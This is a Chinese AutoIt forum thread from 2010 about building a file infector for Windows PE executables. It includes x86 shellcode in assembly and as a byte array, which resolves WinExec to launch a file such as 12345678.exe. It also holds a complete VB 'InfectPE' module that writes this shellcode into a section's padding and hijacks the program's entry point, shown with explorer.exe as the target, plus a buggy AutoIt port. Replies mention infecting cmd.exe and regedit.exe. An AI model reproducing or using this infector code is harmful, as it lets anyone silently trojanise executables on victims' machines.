纯au3实现文件感染运行的问题(已经解决)
本帖最后由 gto250 于 2010-7-12 20:59 编辑昨天在网上看到一个vb感染pe文件的例子,一时心痒就想用au3给写写看,但是到最后,运行的时候竟然内存错误,买糕的!
提供代码,大家一起分析分析
感染后运行的shellcodepush ebp
sub esp, 0x40;
mov ebp, esp;
push ebp
mov eax, fs:0x30
mov eax, ;Ldr
mov esi, ;Flink
lodsd
mov edi, ;edi = kernel32.dll
mov eax, ;eax = PE首部
mov edx,
add edx, edi ;edx = 输出表地址
mov ecx, ;ecx = 输出函数个数
mov ebx,
add ebx, edi ;ebx = 函数名地址
search:
dec ecx
mov esi,
add esi, edi ;依次找每个函数名称
;GetProcAddress
mov eax, 0x50746547
cmp , eax ;'PteG'
jne search
mov eax, 0x41636f72
cmp , eax ;'Acor'
jne search
;如果是GetProcA,表示找到了
mov ebx,
add ebx, edi ;ebx = 索引号地址
mov cx,;ecx = 计算出的索引号值
mov ebx,
add ebx, edi ;ebx = 函数地址的起始位置
mov eax,
add eax, edi ;用索引值,算GetProcAddress
mov , eax ;GetProcAddress的地址=ebp+40
push dword ptr 0x00636578 ;//构造WinExec
push dword ptr 0x456e6957
push esp
push edi
call ;//执行GetProcAddress
mov , eax ;//存入WinExec的地址 到
push 0
push dword ptr 0x6578652e
push dword ptr 0x38373635
push dword ptr 0x34333231//12345678.exe
push esp
Call ;//调用winexec执行同一目录下的12345678.exevb的代码原来看过一份所谓的VB版感染文件的代码,其实就是把文件写到另一个文件的末尾,这是个毛感染啊貌似网上VB版的感染也不多 我发出来一份
感染PE似乎是新手一个不敢涉足的东西,其实还是比较简单的,我偶尔看到了一个见缝插针的小程序,后来联想到了这个感染方式。
见缝插针的功能是把一个小后门(例如1KB以下的下载者等等)先写到目标程序的00区,然后继续在00去加一段代码调用kernel32._lwrite写文件和winexec执行,修改文件入口到这段代码,执行完毕后再跳回去。思路相当好,没有新加区段,PE文件大小也不变。但是缺点就是他调用kernel32的函数的时候用的是本机的函数内存地址,没有用搜索,所以只能在本机使用,换一个机子执行这个被感染的程序就根本不能执行。
这个方法感觉跟加花程序很像很像,我的想法就有了,找一段Shellcode(什么功能自己看着办),然后写到区段的00区,然后修改入口点到Shellcode ,执行完了再跳回原入口!Shellcode使用了寻址调用winexec函数,比上述的程序的通用性要高多了,下面这段代码中用的Shellcode是seer同学的,代码我也附上了。
注:因为Shellcode的原因,要运行的文件名不能大于12个字符比如12345678.exe 不能再长了代码执行成功的话返回值为1 ,并且在目标程序的目录下生成 目标文件名.exe的新程序,运行这个被感染的EXE就会运行当前目录下的12345678.exe了
为了新手的使用方便,我整理成了一个模块,调用函数 InfectPE(要感染的文件,要运行的文件名),例如 InfectPE "c:\windows\explorer.exe","a.exe"
那么再运行explorer.exe的时候,就会运行同一目录下的a.exe
Option Explicit
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long)
Private Type SectionHeader
Name As String * 8
RVA As Long
VirtualSize As Long
PhysicalSize As Long
Offset As Long
flags As Long
End Type
Private Const NeededArea As Long = 133
Dim PE() As Byte, e_lfanew As Long, NumberOfSections As Long, SizeOfOptionalHeader As Long, AddressOfEntryPoint As Long, NumberOfRvaAndSizes As Long
Dim EncStart As Long, EncEnd As Long, SectionTableOffset As Long, SectionTable() As SectionHeader, EntrySection As Long, PaddingArea As Long, tmp As Long
Dim PatchCode(NeededArea - 1) As Byte
Public Function InfectPE(ByVal strTargetFile As String, ByVal strRunFile As String) As Long
On Error GoTo ERR: '设置错误陷坑
'感染的Shellcode
PatchCode(0) = &H60
PatchCode(1) = &H55
PatchCode(2) = &H83
PatchCode(3) = &HEC
PatchCode(4) = &H40
PatchCode(5) = &H8B
PatchCode(6) = &HEC
PatchCode(7) = &H55
PatchCode(8) = &H64
PatchCode(9) = &HA1
PatchCode(10) = &H30
PatchCode(11) = &H0
PatchCode(12) = &H0
PatchCode(13) = &H0
PatchCode(14) = &H8B
PatchCode(15) = &H40
PatchCode(16) = &HC
PatchCode(17) = &H8B
PatchCode(18) = &H70
PatchCode(19) = &H1C
PatchCode(20) = &HAD
PatchCode(21) = &H8B
PatchCode(22) = &H78
PatchCode(23) = &H8
PatchCode(24) = &H8B
PatchCode(25) = &H47
PatchCode(26) = &H3C
PatchCode(27) = &H8B
PatchCode(28) = &H54
PatchCode(29) = &H7
PatchCode(30) = &H78
PatchCode(31) = &H3
PatchCode(32) = &HD7
PatchCode(33) = &H8B
PatchCode(34) = &H4A
PatchCode(35) = &H18
PatchCode(36) = &H8B
PatchCode(37) = &H5A
PatchCode(38) = &H20
PatchCode(39) = &H3
PatchCode(40) = &HDF
PatchCode(41) = &H49
PatchCode(42) = &H8B
PatchCode(43) = &H34
PatchCode(44) = &H8B
PatchCode(45) = &H3
PatchCode(46) = &HF7
PatchCode(47) = &HB8
PatchCode(48) = &H47
PatchCode(49) = &H65
PatchCode(50) = &H74
PatchCode(51) = &H50
PatchCode(52) = &H39
PatchCode(53) = &H6
PatchCode(54) = &H75
PatchCode(55) = &HF1
PatchCode(56) = &HB8
PatchCode(57) = &H72
PatchCode(58) = &H6F
PatchCode(59) = &H63
PatchCode(60) = &H41
PatchCode(61) = &H39
PatchCode(62) = &H46
PatchCode(63) = &H4
PatchCode(64) = &H75
PatchCode(65) = &HE7
PatchCode(66) = &H8B
PatchCode(67) = &H5A
PatchCode(68) = &H24
PatchCode(69) = &H3
PatchCode(70) = &HDF
PatchCode(71) = &H66
PatchCode(72) = &H8B
PatchCode(73) = &HC
PatchCode(74) = &H4B
PatchCode(75) = &H8B
PatchCode(76) = &H5A
PatchCode(77) = &H1C
PatchCode(78) = &H3
PatchCode(79) = &HDF
PatchCode(80) = &H8B
PatchCode(81) = &H4
PatchCode(82) = &H8B
PatchCode(83) = &H3
PatchCode(84) = &HC7
PatchCode(85) = &H89
PatchCode(86) = &H45
PatchCode(87) = &H40
PatchCode(88) = &H68
PatchCode(89) = &H78
PatchCode(90) = &H65
PatchCode(91) = &H63
PatchCode(92) = &H0
PatchCode(93) = &H68
PatchCode(94) = &H57
PatchCode(95) = &H69
PatchCode(96) = &H6E
PatchCode(97) = &H45
PatchCode(98) = &H54
PatchCode(99) = &H57
PatchCode(100) = &HFF
PatchCode(101) = &H55
PatchCode(102) = &H40
PatchCode(103) = &H89
PatchCode(104) = &H45
PatchCode(105) = &H8
PatchCode(106) = &H6A
PatchCode(107) = &H0
PatchCode(108) = &H68
PatchCode(109) = &H2E
PatchCode(110) = &H65
PatchCode(111) = &H78
PatchCode(112) = &H65
PatchCode(113) = &H68
PatchCode(114) = &H35
PatchCode(115) = &H36
PatchCode(116) = &H37
PatchCode(117) = &H38
PatchCode(118) = &H68
PatchCode(119) = &H31
PatchCode(120) = &H32
PatchCode(121) = &H33
PatchCode(122) = &H34
PatchCode(123) = &H54
PatchCode(124) = &HFF
PatchCode(125) = &H55
PatchCode(126) = &H8
PatchCode(127) = &H61
PatchCode(128) = &HE9
''''''''''''''''''''''''''''''''''''''''''''''调用winexec执行当前目录下某文件的Shellcode
Dim i As Long, p As Long, q As Long
If Len(strRunFile) > 12 Then MsgBox "要运行的文件的长度太长了,俺的Shellcode写不下···", , "MSGBOX": Exit Function
If Dir(strTargetFile) = "" Then MsgBox "目标文件貌似不存在吧···", , "MSGBOX": Exit Function
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''用最笨的方法修改Shellcode
PatchCode(119) = "&H" & Hex(Asc(Mid(strRunFile, 1, 1)))
PatchCode(120) = "&H" & Hex(Asc(Mid(strRunFile, 2, 1)))
PatchCode(121) = "&H" & Hex(Asc(Mid(strRunFile, 3, 1)))
PatchCode(122) = "&H" & Hex(Asc(Mid(strRunFile, 4, 1)))
strRunFile = Mid(strRunFile, 5, Len(strRunFile) - 4)
If Len(strRunFile) > 4 Then
For i = 1 To 4
PatchCode(113 + i) = "&H" & Hex(Asc(Mid(strRunFile, i, 1)))
Next
strRunFile = Mid(strRunFile, 5, Len(strRunFile) - 4)
Dim j As Integer
For j = 1 To Len(strRunFile)
PatchCode(108 + j) = "&H" & Hex(Asc(Mid(strRunFile, j, 1)))
Next
If Len(strRunFile) <> 4 Then PatchCode(110 + Len(strRunFile)) = &H0
ElseIf Len(strRunFile) = 4 Then
For i = 1 To 4
PatchCode(113 + i) = "&H" & Hex(Asc(Mid(strRunFile, i, 1)))
PatchCode(109) = &H0
Next
Else
For i = 1 To Len(strRunFile)
PatchCode(113 + i) = "&H" & Hex(Asc(Mid(strRunFile, i, 1)))
Next
PatchCode(114 + Len(strRunFile)) = &H0
End If
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''修改Shellcode完毕,累死我了调试了N次,光发晕
ReDim PE(FileLen(strTargetFile) - 1) '重定义PE的大小
Open strTargetFile For Binary As #1 '读取PE
Get #1, , PE
Close #1
e_lfanew = ReadDword(&H3C&)
NumberOfSections = ReadWord(e_lfanew + 6)
SizeOfOptionalHeader = ReadWord(e_lfanew + &H14&)
AddressOfEntryPoint = ReadWord(e_lfanew + &H28&) '原入口点
If SizeOfOptionalHeader >= &H60& Then
NumberOfRvaAndSizes = ReadDword(e_lfanew + &H74&)
Else
NumberOfRvaAndSizes = 0
End If
If NumberOfRvaAndSizes > 16 Then NumberOfRvaAndSizes = 16
If NumberOfRvaAndSizes > (SizeOfOptionalHeader - &H60&) \ 8 Then NumberOfRvaAndSizes = (SizeOfOptionalHeader - &H60&) \ 8
NumberOfRvaAndSizes = NumberOfRvaAndSizes - 1
EncStart = 0: EncEnd = &H7FFFFFFF
For i = 0 To NumberOfRvaAndSizes
p = ReadDword(e_lfanew + &H78& + i * 8)
q = p + ReadDword(e_lfanew + &H7C& + i * 8)
If p < 0 Or p > q Then
Exit Function
ElseIf p < AddressOfEntryPoint And q < AddressOfEntryPoint Then
If q >= EncStart Then EncStart = q + 1
ElseIf p > AddressOfEntryPoint And q > AddressOfEntryPoint Then
If p <= EncEnd Then EncEnd = p - 1
Else
Exit Function
End If
Next
NumberOfSections = NumberOfSections - 1
SectionTableOffset = e_lfanew + &H18& + SizeOfOptionalHeader
EntrySection = -1
ReDim SectionTable(NumberOfSections)
For i = 0 To NumberOfSections '开始分析区段
With SectionTable(i)
.Name = Read8Str(SectionTableOffset + i * &H28&)
.VirtualSize = ReadDword(SectionTableOffset + i * &H28& + &H8&)
.RVA = ReadDword(SectionTableOffset + i * &H28& + &HC&)
.PhysicalSize = ReadDword(SectionTableOffset + i * &H28& + &H10&)
.Offset = ReadDword(SectionTableOffset + i * &H28& + &H14&)
.flags = ReadDword(SectionTableOffset + i * &H28& + &H24&)
If EntrySection = -1 Then
If (AddressOfEntryPoint >= .RVA) And (AddressOfEntryPoint <= .RVA + .VirtualSize) Then EntrySection = i
End If
End With
Next
If EntrySection = -1 Then Exit Function
With SectionTable(EntrySection)
PaddingArea = .PhysicalSize - .VirtualSize
If PaddingArea < NeededArea Then
Exit Function
End If
For i = .Offset + .VirtualSize To .Offset + .PhysicalSize - 1
If PE(i) <> 0 Then
If MsgBox("Padding Area seems to have data, do you really want to continue?", vbQuestion Or vbYesNo) = vbYes Then
Exit For
Else
Exit Function
End If
End If
Next
If .RVA > EncStart Then EncStart = .RVA
If .RVA + .VirtualSize - 1 < EncEnd Then EncEnd = .RVA + .VirtualSize - 1
tmp = AddressOfEntryPoint - (.RVA + .VirtualSize + NeededArea)
CopyMemory PatchCode(129), tmp, 4
CopyMemory PE(.Offset + .VirtualSize), PatchCode(0), NeededArea
AddressOfEntryPoint = .RVA + .VirtualSize
WriteDword e_lfanew + &H28&, AddressOfEntryPoint
.VirtualSize = .VirtualSize + NeededArea
WriteDword SectionTableOffset + EntrySection * &H28& + &H8&, .VirtualSize
.flags = .flags Or &H80000000
WriteDword SectionTableOffset + EntrySection * &H28& + &H24&, .flags
End With
Open strTargetFile & ".exe" For Binary As #1 '生成新文件
Put #1, , PE
Close #1
InfectPE = 1
Exit Function
ERR:
InfectPE = 0
End Function
Private Function ReadWord(ByVal Offset As Long) As Long
CopyMemory ReadWord, PE(Offset), 2
End Function
Private Function ReadDword(ByVal Offset As Long) As Long
CopyMemory ReadDword, PE(Offset), 4
End Function
Private Sub WriteDword(ByVal Offset As Long, ByVal Data As Long)
CopyMemory PE(Offset), Data, 4
End Sub
Private Function Add0To8(ByVal InputStr As String) As String
Add0To8 = String(8 - Len(InputStr), "0") & InputStr
End Function
Private Function Read8Str(ByVal Offset As Long) As String
Dim i As Long, c As Byte, s As String
For i = 0 To 7
c = PE(Offset + i)
If c < 32 Or c > 127 Then c = 32
s = s & Chr(c)
Next
Read8Str = s
End Function我自己写的au3代码#Include <Memory.au3>
$file="E:\Program Files\SnapShot.exe";要感染的文件
Const $NeededArea = 133
Dim $PatchCode[$NeededArea - 1]
$PatchCode = 0x60
$PatchCode = 0x55
$PatchCode = 0x83
$PatchCode = 0xEC
$PatchCode = 0x40
$PatchCode = 0x8B
$PatchCode = 0xEC
$PatchCode = 0x55
$PatchCode = 0x64
$PatchCode = 0xA1
$PatchCode = 0x30
$PatchCode = 0x0
$PatchCode = 0x0
$PatchCode = 0x0
$PatchCode = 0x8B
$PatchCode = 0x40
$PatchCode = 0xC
$PatchCode = 0x8B
$PatchCode = 0x70
$PatchCode = 0x1C
$PatchCode = 0xAD
$PatchCode = 0x8B
$PatchCode = 0x78
$PatchCode = 0x8
$PatchCode = 0x8B
$PatchCode = 0x47
$PatchCode = 0x3C
$PatchCode = 0x8B
$PatchCode = 0x54
$PatchCode = 0x7
$PatchCode = 0x78
$PatchCode = 0x3
$PatchCode = 0xD7
$PatchCode = 0x8B
$PatchCode = 0x4A
$PatchCode = 0x18
$PatchCode = 0x8B
$PatchCode = 0x5A
$PatchCode = 0x20
$PatchCode = 0x3
$PatchCode = 0xDF
$PatchCode = 0x49
$PatchCode = 0x8B
$PatchCode = 0x34
$PatchCode = 0x8B
$PatchCode = 0x3
$PatchCode = 0xF7
$PatchCode = 0xB8
$PatchCode = 0x47
$PatchCode = 0x65
$PatchCode = 0x74
$PatchCode = 0x50
$PatchCode = 0x39
$PatchCode = 0x6
$PatchCode = 0x75
$PatchCode = 0xF1
$PatchCode = 0xB8
$PatchCode = 0x72
$PatchCode = 0x6F
$PatchCode = 0x63
$PatchCode = 0x41
$PatchCode = 0x39
$PatchCode = 0x46
$PatchCode = 0x4
$PatchCode = 0x75
$PatchCode = 0xE7
$PatchCode = 0x8B
$PatchCode = 0x5A
$PatchCode = 0x24
$PatchCode = 0x3
$PatchCode = 0xDF
$PatchCode = 0x66
$PatchCode = 0x8B
$PatchCode = 0xC
$PatchCode = 0x4B
$PatchCode = 0x8B
$PatchCode = 0x5A
$PatchCode = 0x1C
$PatchCode = 0x3
$PatchCode = 0xDF
$PatchCode = 0x8B
$PatchCode = 0x4
$PatchCode = 0x8B
$PatchCode = 0x3
$PatchCode = 0xC7
$PatchCode = 0x89
$PatchCode = 0x45
$PatchCode = 0x40
$PatchCode = 0x68
$PatchCode = 0x78
$PatchCode = 0x65
$PatchCode = 0x63
$PatchCode = 0x0
$PatchCode = 0x68
$PatchCode = 0x57
$PatchCode = 0x69
$PatchCode = 0x6E
$PatchCode = 0x45
$PatchCode = 0x54
$PatchCode = 0x57
$PatchCode = 0xFF
$PatchCode = 0x55
$PatchCode = 0x40
$PatchCode = 0x89
$PatchCode = 0x45
$PatchCode = 0x8
$PatchCode = 0x6A
$PatchCode = 0x0
$PatchCode = 0x68
$PatchCode = 0x2E
$PatchCode = 0x65
$PatchCode = 0x78
$PatchCode = 0x65
$PatchCode = 0x68
$PatchCode = 0x35
$PatchCode = 0x36
$PatchCode = 0x37
$PatchCode = 0x38
$PatchCode = 0x68
$PatchCode = 0x31
$PatchCode = 0x32
$PatchCode = 0x33
$PatchCode = 0x34
$PatchCode = 0x54
$PatchCode = 0xFF
$PatchCode = 0x55
$PatchCode = 0x8
$PatchCode = 0x61
$PatchCode = 0xE9
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
$size=FileGetSize($file)
$fd=FileOpen($file,16)
Dim $pe[$size+1]
For $i = 0 To $size Step 1
$pe[$i] = FileRead($fd, 1)
Next
$e_lfanew = ReadDword(0x3C)
$NumberOfSections = ReadWord($e_lfanew + 6)
$SizeOfOptionalHeader = ReadWord($e_lfanew + 0x14)
$AddressOfEntryPoint = ReadWord($e_lfanew + 0x28) ;原入口点
If $SizeOfOptionalHeader >= 0x60 Then
$NumberOfRvaAndSizes = ReadDword($e_lfanew + 0x74)
Else
$NumberOfRvaAndSizes = 0
EndIf
If $NumberOfRvaAndSizes > 16 Then $NumberOfRvaAndSizes = 16
If $NumberOfRvaAndSizes > zc(($SizeOfOptionalHeader - 0x60) , 8 ) Then $NumberOfRvaAndSizes = zc(($SizeOfOptionalHeader - 0x60) , 8)
$EncStart = 0
$EncEnd = 0x7FFFFFFF
For $i = 0 To $NumberOfRvaAndSizes
$p = ReadDword($e_lfanew + 0x78 + $i * 8)
$q = $p + ReadDword($e_lfanew + 0x7C + $i * 8)
If $p < 0 Or $p > $q Then
ExitLoop
ElseIf $p < $AddressOfEntryPoint And $q < $AddressOfEntryPoint Then
If $q >= $EncStart Then $EncStart = $q + 1
ElseIf $p > $AddressOfEntryPoint And $q > $AddressOfEntryPoint Then
If $p <= $EncEnd Then $EncEnd = $p - 1
Else
ExitLoop
EndIf
Next
$SectionTableOffset = $e_lfanew + 0x18 + $SizeOfOptionalHeader
$EntrySection = -1
Dim $Name[$NumberOfSections],$RVA[$NumberOfSections],$VirtualSize[$NumberOfSections],$PhysicalSize[$NumberOfSections],$Offset[$NumberOfSections],$flags[$NumberOfSections]
For $i = 0 To $NumberOfSections-1
$Name[$i]=Read8Str($SectionTableOffset + $i * 0x28)
$VirtualSize[$i]= ReadDword($SectionTableOffset + $i * 0x28 + 0x8)
$RVA[$i]=ReadDword($SectionTableOffset + $i * 0x28 + 0xC)
$PhysicalSize[$i]=ReadDword($SectionTableOffset + $i * 0x28 + 0x10)
$Offset[$i]=ReadDword($SectionTableOffset + $i * 0x28 + 0x14)
$flags[$i]=ReadDword($SectionTableOffset + $i * 0x28 + 0x24)
If $EntrySection = -1 Then
If ($AddressOfEntryPoint >= ReadDword($SectionTableOffset + $i * 0x28 + 0xC)) And ($AddressOfEntryPoint <= ReadDword($SectionTableOffset + $i * 0x28 + 0xC) + ReadDword($SectionTableOffset + $i * 0x28 + 0x8)) Then $EntrySection = $i
EndIf
Next
$the_EntrySection_PhysicalSize=$Name[$EntrySection]
$the_EntrySection_VirtualSize=$VirtualSize[$EntrySection]
$the_EntrySection_Offset =$Offset[$EntrySection]
$the_EntrySection_VirtualSize=$VirtualSize[$EntrySection]
$the_EntrySection_RVA=$RVA[$EntrySection]
$the_EntrySection_flags=$flags[$EntrySection]
$PaddingArea = $the_EntrySection_PhysicalSize - $the_EntrySection_VirtualSize
If $PaddingArea < $NeededArea Then
;Exit Function
EndIf
For $i =$the_EntrySection_Offset +$the_EntrySection_VirtualSize To $the_EntrySection_Offset + $the_EntrySection_PhysicalSize - 1
If $PE[$i] <> 0 Then
If MsgBox(4,"","Padding Area seems to have data, do you really want to continue?") = 6 Then
ExitLoop
Else
;Exit Function
EndIf
EndIf
Next
If $the_EntrySection_RVA > $EncStart Then $EncStart = $the_EntrySection_RVA
If $the_EntrySection_RVA + $the_EntrySection_VirtualSize - 1 < $EncEnd Then $EncEnd = $the_EntrySection_RVA + $the_EntrySection_VirtualSize - 1
$tmp = $AddressOfEntryPoint - ($the_EntrySection_RVA + $the_EntrySection_VirtualSize + $NeededArea)
CopyMemory ($PatchCode, $tmp, 4)
CopyMemory ($PE[$the_EntrySection_Offset + $the_EntrySection_VirtualSize], $PatchCode, $NeededArea)
$AddressOfEntryPoint = $the_EntrySection_RVA + $the_EntrySection_VirtualSize
WriteDword($e_lfanew + 0x28, $AddressOfEntryPoint)
$the_EntrySection_VirtualSize = $the_EntrySection_VirtualSize + $NeededArea
WriteDword($SectionTableOffset + $EntrySection * 0x28& + 0x8, $the_EntrySection_VirtualSize)
$the_EntrySection_flags = $the_EntrySection_flags Or 0x80000000
WriteDword($SectionTableOffset + $EntrySection * 0x28 + 0x24, $the_EntrySection_flags)
$ggg=FileOpen("ss123.exe",18)
For $i=0 To UBound($pe[$size+1])
FileWrite($ggg,$pe[$i])
Next
FileClose($ggg)
Func CopyMemory($a,$b,$c)
Dim $pDest
$dd=DllStructCreate("byte yuan")
DllStructSetData($dd,1,$b)
$ee=DllStructCreate("byte mubiao")
DllStructSetData($dd,1,$a)
_MemMoveMemory(DllStructGetPtr($dd), DllStructGetPtr($ee),$c)
EndFunc
Func zc($n1,$n2)
Local $code
$code&='Function chu(Num1,Num2)'&@CRLF
$code&='chu=Num1\Num2'&@CRLF
$code&='End Function'&@CRLF
$VBS = ObjCreate("ScriptControl")
$VBS.language = "vbscript"
$VBS.addcode($code)
Return $vbs.run("chu",$n1,$n2)
EndFunc
Func Read8Str($offset)
Dim $s
For $i=0 To 7
$c=$pe[$offset+$i]
If $c<32 Or $c>127 Then $c=32
$s=$s&Chr($c)
Next
Return $s
EndFunc
Func readDword($offset)
Dim $pDest
$dd=DllStructCreate("byte ok")
DllStructSetData($dd,1,$pe[$offset])
$ee=DllStructCreate("byte dest")
_MemMoveMemory(DllStructGetPtr($dd), DllStructGetPtr($ee),4)
Return DllStructGetData($ee,"dest")
EndFunc
Func writeDword($offset,$date)
$dd=DllStructCreate("byte ok")
DllStructSetData($dd,1,$pe[$offset])
$ee=DllStructCreate("long")
DllStructSetData($ee,1,$date)
_MemMoveMemory(DllStructGetPtr($ee),DllStructGetPtr($dd), 4)
EndFunc
Func readword($offset)
Dim $pDest
$dd=DllStructCreate("byte ok")
DllStructSetData($dd,1,$pe[$offset])
$ee=DllStructCreate("byte dest")
_MemMoveMemory(DllStructGetPtr($dd), DllStructGetPtr($ee),2)
Return DllStructGetData($ee,"dest")
EndFunc
就在发帖的现在我突然有了个想法,其实,可能并不需要修改段的读写,因为在做逆向的时候,我们可以直接在Ollydbg中写入汇编,然后进行入口的跳转修改,在上面的au3中,我们既然能找到空闲的段,能找到入口,那么我们只要把shellcode的16进制代码写入00处,然后写跳转到原入口的16进制码,再将入口修改为我们现在的代码就可以了。
当然,这是我纯粹想想的,希望大家讨论一下 完全外行
如果能看懂熊猫烧香的源码借鉴下或者能思路更开阔些
可惜没有这个源码
逆而行之
理解怎么清除熊猫烧香或许也有帮助
用C编写的,在Turbo C中编译运行即可,但必须要有“windows.h”头文件,此文件自行下载
本帖最后由 pusofalse 于 2010-7-11 03:05 编辑
**** Hidden Message *****
试写了一下,在XP SP3 eng中测试成功,感染当前目录下的1.exe,在其运行时先弹出一个显示"Error"的MessageBox对话框,需要其他的功能自己写相应的机器码就是了。发现如果是感染au3编译的文件,受感染的文件会出现不能正常运行的情况,说什么ReadProcessMemory错误。其他文件没问题,如cmd.exe、regedit.exe。
需要用到的两个外部文件:
Thread.au3 - 纯AU3拦截进程创建,并阻止或允许其运行
LocalSecurityAuthority.au3 - Au3 本地安全管理|审核UDF LocalSecurityAuthority 很强大,好好理解一下! 搞破坏的啊。。。。。。。。。 看不懂,遗憾的路过… 本帖最后由 gto250 于 2010-7-12 20:58 编辑
高手出马、立马解决!
另:au3的程序,是附加数据的,如果没有处理好的话就会内存错误,就算是加个空白节上去,也会出现内存错误 回复 7# gto250
复习了一下PE结构,发现3#的代码完全是不通用的。
只有在0区域足够长的情况下,3#的代码才能正常工作。
如果仅剩余100字节的0区域,而机器码的长度为200字节,上面的代码就over了,会破坏掉原始数据,使被感染的程序无法正常工作。
尝试改变代码段的长度,在其后加一段足够长的0字节,结果测试失败。 汗、、、、看不懂。 楼上几位高手的招数实在太快,看不清楚,也看不懂状况~{:face (301):} 牛人牛贴牛回复。。。。。 不懂,涉及的东西太多............. 看不懂,遗憾的路过。。,
页:
[1]